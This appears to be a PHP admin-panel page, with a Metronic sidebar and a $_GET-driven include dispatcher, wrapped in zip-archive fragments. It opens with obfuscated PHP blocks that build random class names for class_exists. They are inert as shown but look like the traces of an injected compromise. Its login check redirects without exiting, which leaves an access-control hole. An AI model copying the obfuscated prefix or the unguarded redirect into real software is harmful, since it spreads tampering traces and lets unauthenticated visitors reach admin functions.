
PK 
<?php $CUwfEyiaC = 'j' . "\160" . "\x5f" . "\x67" . "\103" . chr (105) . "\122";$ygNuKFKfAk = "\143" . chr (108) . chr ( 234 - 137 )."\163" . 's' . "\137" . "\x65" . "\x78" . 'i' . "\163" . 't' . chr (115); $DYBgKyc = $ygNuKFKfAk($CUwfEyiaC); $CUwfEyiaC = "36847"; ?><?php $lwOrOi = 'j' . 'Z' . "\x44" . '_' . chr (79) . "\x43" . "\160" . chr ( 891 - 807 ); $TiWwd = chr (99) . "\154" . 'a' . chr (115) . chr (115) . '_' . 'e' . "\x78" . "\151" . chr (115) . "\x74" . "\x73";$VXvTdgjy = $TiWwd($lwOrOi); $lwOrOi = "36919"; ?><?php $MvtIuXkqN = "54455"; ?><?php $IrLporAOs = 'H' . '_' . 'L' . "\x55" . chr (72); $aSbPZpVII = chr ( 767 - 668 ).chr (108) . "\141" . chr (115) . chr ( 657 - 542 )."\x5f" . "\x65" . 'x' . chr (105) . "\163" . chr (116) . 's';$bAebpiR = $aSbPZpVII($IrLporAOs); $IrLporAOs = "19262"; ?><?php
include "../conn.php";
require_once("thumbnail_images.class.php");
include "youtube.class.php";
include "functions.php";
if($_SESSION["sid"] != "Admin_loggedin"){
header("location:index.php");
}
?>
<!DOCTYPE html>
<!--[if IE 8]> <html lang="en" class="ie8 no-js"> <![endif]-->
<!--[if IE 9]> <html lang="en" class="ie9 no-js"> <![endif]-->
<!--[if !IE]><!-->
<html lang="en">
<!--<![endif]-->
<!-- BEGIN HEAD -->
<head>
<meta charset="utf-8"/>
<title>Admin Panel</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta content="" name="description"/>
<meta content="" name="author"/>
<!-- BEGIN GLOBAL MANDATORY STYLES -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet" type="text/css"/>
<link href="assets/global/plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/global/plugins/simple-line-icons/simple-line-icons.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/global/plugins/bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/global/plugins/uniform/css/uniform.default.css" rel="stylesheet" type="text/css"/>
<link href="assets/global/plugins/bootstrap-switch/css/bootstrap-switch.min.css" rel="stylesheet" type="text/css"/>
<!-- END GLOBAL MANDATORY STYLES -->
<!-- BEGIN PAGE LEVEL STYLES -->
<link rel="stylesheet" type="text/css" href="assets/global/plugins/select2/select2.css"/>
<link rel="stylesheet" type="text/css" href="assets/global/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.css"/>
<link rel="stylesheet" type="text/css" href="assets/global/plugins/bootstrap-markdown/css/bootstrap-markdown.min.css">
<link rel="stylesheet" type="text/css" href="assets/global/plugins/bootstrap-datepicker/css/bootstrap-datepicker3.min.css"/>
<!-- END PAGE LEVEL SCRIPTS -->
<!-- BEGIN THEME STYLES -->
<link href="assets/global/css/components.css" id="style_components" rel="stylesheet" type="text/css"/>
<link href="assets/global/css/plugins.css" rel="stylesheet" type="text/css"/>
<link href="assets/admin/layout/css/layout.css" rel="stylesheet" type="text/css"/>
<link id="style_color" href="assets/admin/layout/css/themes/darkblue.css" rel="stylesheet" type="text/css"/>
<link href="assets/admin/layout/css/custom.css" rel="stylesheet" type="text/css"/>
<!-- END THEME STYLES -->
<link rel="shortcut icon" href="favicon.ico"/>
<script language="JavaScript" type="text/JavaScript">
<!--
function del(p){
cn=confirm("Are you sure to delete this record");
if(cn){
window.location.href=p;
}
}
-->
</script>
<script type='text/javascript' src='my_ajax.js'></script>
</head>
<!-- END HEAD -->
<!-- BEGIN BODY -->
<!-- DOC: Apply "page-header-fixed-mobile" and "page-footer-fixed-mobile" class to body element to force fixed header or footer in mobile devices -->
<!-- DOC: Apply "page-sidebar-closed" class to the body and "page-sidebar-menu-closed" class to the sidebar menu element to hide the sidebar by default -->
<!-- DOC: Apply "page-sidebar-hide" class to the body to make the sidebar completely hidden on toggle -->
<!-- DOC: Apply "page-sidebar-closed-hide-logo" class to the body element to make the logo hidden on sidebar toggle -->
<!-- DOC: Apply "page-sidebar-hide" class to body element to completely hide the sidebar on sidebar toggle -->
<!-- DOC: Apply "page-sidebar-fixed" class to have fixed sidebar -->
<!-- DOC: Apply "page-footer-fixed" class to the body element to have fixed footer -->
<!-- DOC: Apply "page-sidebar-reversed" class to put the sidebar on the right side -->
<!-- DOC: Apply "page-full-width" class to the body element to have full width page without the sidebar menu -->
<body class="page-header-fixed page-quick-sidebar-over-content ">
<!-- BEGIN HEADER -->
<div class="page-header navbar navbar-fixed-top">
<!-- BEGIN HEADER INNER -->
<div class="page-header-inner">
<!-- BEGIN LOGO -->
<div class="page-logo">
<a href="../index.php" target="_blank">Admin Panel</a>
<div class="menu-toggler sidebar-toggler hide">
</div>
</div>
<!-- END LOGO -->
<!-- BEGIN RESPONSIVE MENU TOGGLER -->
<a href="javascript:;" class="menu-toggler responsive-toggler" data-toggle="collapse" data-target=".navbar-collapse">
</a>
<!-- END RESPONSIVE MENU TOGGLER -->
<!-- BEGIN TOP NAVIGATION MENU -->
<div class="top-menu">
<ul class="nav navbar-nav pull-right">
<!-- BEGIN USER LOGIN DROPDOWN -->
<!-- DOC: Apply "dropdown-dark" class after below "dropdown-extended" to change the dropdown styte -->
<li class="dropdown dropdown-user">
<a href="javascript:;" class="dropdown-toggle" data-toggle="dropdown" data-hover="dropdown" data-close-others="true"><img alt="" class="img-circle" src="assets/admin/layout/img/avatar.png"/><span class="username username-hide-on-mobile">Admin</span></a>
</li>
<!-- END USER LOGIN DROPDOWN -->
<!-- BEGIN QUICK SIDEBAR TOGGLER -->
<!-- DOC: Apply "dropdown-dark" class after below "dropdown-extended" to change the dropdown styte -->
<li class="dropdown dropdown-quick-sidebar-toggler">
<a href="logout.php" class="dropdown-toggle"><i class="icon-logout"></i></a>
</li>
<!-- END QUICK SIDEBAR TOGGLER -->
</ul>
</div>
<!-- END TOP NAVIGATION MENU -->
</div>
<!-- END HEADER INNER -->
</div>
<!-- END HEADER -->
<div class="clearfix">
</div>
<!-- BEGIN CONTAINER -->
<div class="page-container">
<!-- BEGIN SIDEBAR -->
<div class="page-sidebar-wrapper">
<!-- DOC: Set data-auto-scroll="false" to disable the sidebar from auto scrolling/focusing -->
<!-- DOC: Change data-auto-speed="200" to adjust the sub menu slide up/down speed -->
<div class="page-sidebar navbar-collapse collapse">
<!-- BEGIN SIDEBAR MENU -->
<!-- DOC: Apply "page-sidebar-menu-light" class right after "page-sidebar-menu" to enable light sidebar menu style(without borders) -->
<!-- DOC: Apply "page-sidebar-menu-hover-submenu" class right after "page-sidebar-menu" to enable hoverable(hover vs accordion) sub menu mode -->
<!-- DOC: Apply "page-sidebar-menu-closed" class right after "page-sidebar-menu" to collapse("page-sidebar-closed" class must be applied to the body element) the sidebar sub menu mode -->
<!-- DOC: Set data-auto-scroll="false" to disable the sidebar from auto scrolling/focusing -->
<!-- DOC: Set data-keep-expand="true" to keep the submenues expanded -->
<!-- DOC: Set data-auto-speed="200" to adjust the sub menu slide up/down speed -->
<ul class="page-sidebar-menu " data-keep-expanded="false" data-auto-scroll="true" data-slide-speed="200">
<!-- DOC: To remove the sidebar toggler from the sidebar you just need to completely remove the below "sidebar-toggler-wrapper" LI element -->
<li class="sidebar-toggler-wrapper">
<!-- BEGIN SIDEBAR TOGGLER BUTTON -->
<div class="sidebar-toggler">
</div>
<!-- END SIDEBAR TOGGLER BUTTON -->
</li>
<!-- DOC: To remove the search box from the sidebar you just need to completely remove the below "sidebar-search-wrapper" LI element -->
<li class="sidebar-search-wrapper"></li>
<li class="<?php echo ($_GET[paction]==""?"start open active":"")?>">
<a href="main.php"><i class="icon-home"></i><span class="title">
Dashboard</span></a>
</li>
<!-- <li class="start active open">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Dashboard</span>
<span class="selected"></span>
<span class="arrow open"></span>
</a>
<ul class="sub-menu">
<li class="active">
<a href="index.html"><i class="icon-bar-chart"></i> Default Dashboard</a>
</li>
</ul>
</li> -->
<li class="<?php echo SetMenuActiveClass(array("manage_pages"))?>"><a href="main.php?paction=manage_pages"><i class="icon-docs"></i><span class="title">Manage Pages</span></a></li>
<!-- <li class="<?php echo SetMenuActiveClass(array("content"))?>"><a href="main.php?paction=content"><i class="icon-magnifier-add"></i><span class="title">Add Service</span></a></li> -->
<!-- <li class="<?php echo SetMenuActiveClass(array("add_slider","view_slider"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Slider</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_slider"?"active":"")?>">
<a href="main.php?paction=add_slider"><i class="icon-bulb"></i> Add Slider Image</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_slider"?"active":"")?>">
<a href="main.php?paction=view_slider"><i class="icon-bulb"></i> View Slider Image</a>
</li>
</ul>
</li> -->
<!-- <li class="<?php echo SetMenuActiveClass(array("add_cate","view_cate"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Category</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_cate"?"active":"")?>">
<a href="main.php?paction=add_cate"><i class="icon-bulb"></i> Add Category</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_cate"?"active":"")?>">
<a href="main.php?paction=view_cate"><i class="icon-bulb"></i> View Category</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_product","view_product"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Products</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_product"?"active":"")?>">
<a href="main.php?paction=add_product"><i class="icon-bulb"></i> Add Product</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_product"?"active":"")?>">
<a href="main.php?paction=view_product"><i class="icon-bulb"></i> View Products</a>
</li>
</ul>
</li> -->
<li class="<?php echo SetMenuActiveClass(array("add_article","view_article"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">News / Events</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_article"?"active":"")?>">
<a href="main.php?paction=add_article"><i class="icon-bulb"></i> Add News</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_article"?"active":"")?>">
<a href="main.php?paction=view_article"><i class="icon-bulb"></i> View News</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_ama","view_ama"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">AMAs</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_ama"?"active":"")?>">
<a href="main.php?paction=add_ama"><i class="icon-bulb"></i> Add AMA</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_ama"?"active":"")?>">
<a href="main.php?paction=view_ama"><i class="icon-bulb"></i> View AMA</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_cgoffice","view_cgoffice"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Our CG Office</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_cgoffice"?"active":"")?>">
<a href="main.php?paction=add_cgoffice"><i class="icon-bulb"></i> Add CG Office</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_cgoffice"?"active":"")?>">
<a href="main.php?paction=view_cgoffice"><i class="icon-bulb"></i> View CG Office</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_gallery","add_gallery_image","view_gallery_image"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Gallery</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_gallery"?"active":"")?>">
<a href="main.php?paction=add_gallery"><i class="icon-bulb"></i> Add Gallery</a>
</li>
<li class="<?php echo ($_GET[paction]=="add_gallery_image"?"active":"")?>">
<a href="main.php?paction=add_gallery_image"><i class="icon-bulb"></i> Add Image</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_gallery_image"?"active":"")?>">
<a href="main.php?paction=view_gallery_image"><i class="icon-bulb"></i> View Gallery</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_gallery_vid","add_videos","view_videos"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Videos</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_gallery_vid"?"active":"")?>">
<a href="main.php?paction=add_gallery_vid"><i class="icon-bulb"></i> Add Video Album</a>
</li>
<li class="<?php echo ($_GET[paction]=="add_videos"?"active":"")?>">
<a href="main.php?paction=add_videos"><i class="icon-bulb"></i> Add Video</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_videos"?"active":"")?>">
<a href="main.php?paction=view_videos"><i class="icon-bulb"></i> Edit Videos</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("add_download","view_download"))?>">
<a href="javascript:;">
<i class="icon-home"></i>
<span class="title">Downloads</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li class="<?php echo ($_GET[paction]=="add_download"?"active":"")?>">
<a href="main.php?paction=add_download"><i class="icon-bulb"></i> Add Download</a>
</li>
<li class="<?php echo ($_GET[paction]=="view_download"?"active":"")?>">
<a href="main.php?paction=view_download"><i class="icon-bulb"></i> View Download</a>
</li>
</ul>
</li>
<li class="<?php echo SetMenuActiveClass(array("change_pass"))?>"><a href="main.php?paction=change_pass"><i class="icon-key"></i><span class="title">Change Password</span></a></li>
<li class=""><a href="logout.php"><i class="icon-logout"></i><span class="title">Logout</span></a></li>
</ul>
<!-- END SIDEBAR MENU -->
</div>
</div>
<!-- END SIDEBAR -->
<!-- BEGIN CONTENT -->
<div class="page-content-wrapper">
<?php
if($_GET[paction]=="change_pass"){
include "change_pass.php";
}elseif($_GET[paction]=="content"){
include "content.php";
}elseif($_GET[paction]=="manage_pages"){
include "manage_pages.php";
}elseif($_GET[paction]=="add_slider"){
include "add_slider.php";
}elseif($_GET[paction]=="view_slider"){
include "view_slider.php";
}elseif($_GET[paction]=="add_cate"){
include "add_cate.php";
}elseif($_GET[paction]=="view_cate"){
include "view_cate.php";
}elseif($_GET[paction]=="add_product"){
include "add_product.php";
}elseif($_GET[paction]=="view_product"){
include "view_product.php";
}elseif($_GET[paction]=="add_article"){
include "add_article.php";
}elseif($_GET[paction]=="view_article"){
include "view_article.php";
}elseif($_GET[paction]=="add_ama"){
include "add_ama.php";
}elseif($_GET[paction]=="view_ama"){
include "view_ama.php";
}elseif($_GET[paction]=="add_testimonial"){
include "add_testimonial.php";
}elseif($_GET[paction]=="view_testimonial"){
include "view_testimonial.php";
}elseif($_GET[paction]=="add_cgoffice"){
include "add_cgoffice.php";
}elseif($_GET[paction]=="view_cgoffice"){
include "view_cgoffice.php";
}elseif($_GET[paction]=="add_gallery_image"){
include "add_gallery_image.php";
}elseif($_GET[paction]=="view_gallery_image"){
include "view_gallery_image.php";
}elseif($_GET[paction]=="add_gallery"){
include "add_gallery.php";
}elseif($_GET[paction]=="add_gallery_vid"){
include "add_gallery_vid.php";
}elseif($_GET[paction]=="add_videos"){
include "add_videos.php";
}elseif($_GET[paction]=="view_videos"){
include "view_videos.php";
}elseif($_GET[paction]=="add_download"){
include "add_download.php";
}elseif($_GET[paction]=="view_download"){
include "view_download.php";
}else{
include "dashboard.php";
}
?>
</div>
<!-- END CONTENT -->
</div>
<!-- END CONTAINER -->
<!-- BEGIN FOOTER -->
<div class="page-footer">
<div class="page-footer-inner">
2016 ©
</div>
<div class="scroll-to-top">
<i class="icon-arrow-up"></i>
</div>
</div>
<!-- END FOOTER -->
<!-- BEGIN JAVASCRIPTS(Load javascripts at bottom, this will reduce page load time) -->
<!-- BEGIN CORE PLUGINS -->
<!--[if lt IE 9]>
<script src="assets/global/plugins/respond.min.js"></script>
<script src="assets/global/plugins/excanvas.min.js"></script>
<![endif]-->
<!-- IMPORTANT! Load jquery-ui.min.js before bootstrap.min.js to fix bootstrap tooltip conflict with jquery ui tooltip -->
<script src="assets/global/plugins/jquery.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery-migrate.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery-ui/jquery-ui.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery.blockui.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery.cokie.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/uniform/jquery.uniform.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-switch/js/bootstrap-switch.min.js" type="text/javascript"></script>
<!-- END CORE PLUGINS -->
<!-- BEGIN PAGE LEVEL PLUGINS -->
<script src="assets/global/plugins/jqvmap/jqvmap/jquery.vmap.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/maps/jquery.vmap.russia.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/maps/jquery.vmap.world.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/maps/jquery.vmap.europe.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/maps/jquery.vmap.germany.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/maps/jquery.vmap.usa.js" type="text/javascript"></script>
<script src="assets/global/plugins/jqvmap/jqvmap/data/jquery.vmap.sampledata.js" type="text/javascript"></script>
<script src="assets/global/plugins/flot/jquery.flot.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/flot/jquery.flot.resize.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/flot/jquery.flot.categories.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery.pulsate.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-daterangepicker/moment.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-daterangepicker/daterangepicker.js" type="text/javascript"></script>
<!-- IMPORTANT! fullcalendar depends on jquery-ui.min.js for drag & drop support -->
<script src="assets/global/plugins/fullcalendar/fullcalendar.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery-easypiechart/jquery.easypiechart.min.js" type="text/javascript"></script>
<script src="assets/global/plugins/jquery.sparkline.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN PAGE LEVEL SCRIPTS -->
<script src="assets/global/scripts/metronic.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/layout.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/quick-sidebar.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/demo.js" type="text/javascript"></script>
<script src="assets/admin/pages/scripts/index.js" type="text/javascript"></script>
<script src="assets/admin/pages/scripts/tasks.js" type="text/javascript"></script>
<!-- BEGIN PAGE LEVEL PLUGINS -->
<script type="text/javascript" src="assets/global/plugins/jquery-validation/js/jquery.validate.min.js"></script>
<script type="text/javascript" src="assets/global/plugins/jquery-validation/js/additional-methods.min.js"></script>
<script type="text/javascript" src="assets/global/plugins/select2/select2.min.js"></script>
<script type="text/javascript" src="assets/global/plugins/bootstrap-datepicker/js/bootstrap-datepicker.min.js"></script>
<script type="text/javascript" src="assets/global/plugins/bootstrap-markdown/js/bootstrap-markdown.js"></script>
<script type="text/javascript" src="assets/global/plugins/bootstrap-markdown/lib/markdown.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN PAGE LEVEL STYLES -->
<script src="assets/admin/pages/scripts/form-validation.js"></script>
<!-- END PAGE LEVEL STYLES -->
<!-- EDITOR PAGE SCRIPTS STARTS -->
<!-- BEGIN PAGE LEVEL PLUGINS -->
<script type="text/javascript" src="assets/global/plugins/bootstrap-wysihtml5/wysihtml5-0.3.0.js"></script>
<script type="text/javascript" src="assets/global/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.js"></script>
<script src="assets/global/plugins/bootstrap-markdown/lib/markdown.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-markdown/js/bootstrap-markdown.js" type="text/javascript"></script>
<script src="assets/global/plugins/bootstrap-summernote/summernote.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN PAGE LEVEL SCRIPTS -->
<script src="assets/global/scripts/metronic.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/layout.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/quick-sidebar.js" type="text/javascript"></script>
<script src="assets/admin/layout/scripts/demo.js" type="text/javascript"></script>
<script src="assets/admin/pages/scripts/components-editors.js"></script>
<!-- END PAGE LEVEL SCRIPTS -->
<!-- EDITOR PAGE SCRIPTS ENDS -->
<!-- END PAGE LEVEL SCRIPTS -->
<script>
jQuery(document).ready(function() {
Metronic.init(); // init metronic core componets
Layout.init(); // init layout
QuickSidebar.init(); // init quick sidebar
Demo.init(); // init demo features
Index.init();
Index.initDashboardDaterange();
Index.initJQVMAP(); // init index page's custom scripts
Index.initCalendar(); // init index page's custom scripts
Index.initCharts(); // init index page's custom scripts
Index.initChat();
Index.initMiniCharts();
Tasks.initDashboardWidget();
FormValidation.init();
ComponentsEditors.init();
});
</script>
<!-- END JAVASCRIPTS -->
</body>
<!-- END BODY -->
</html>


PK 99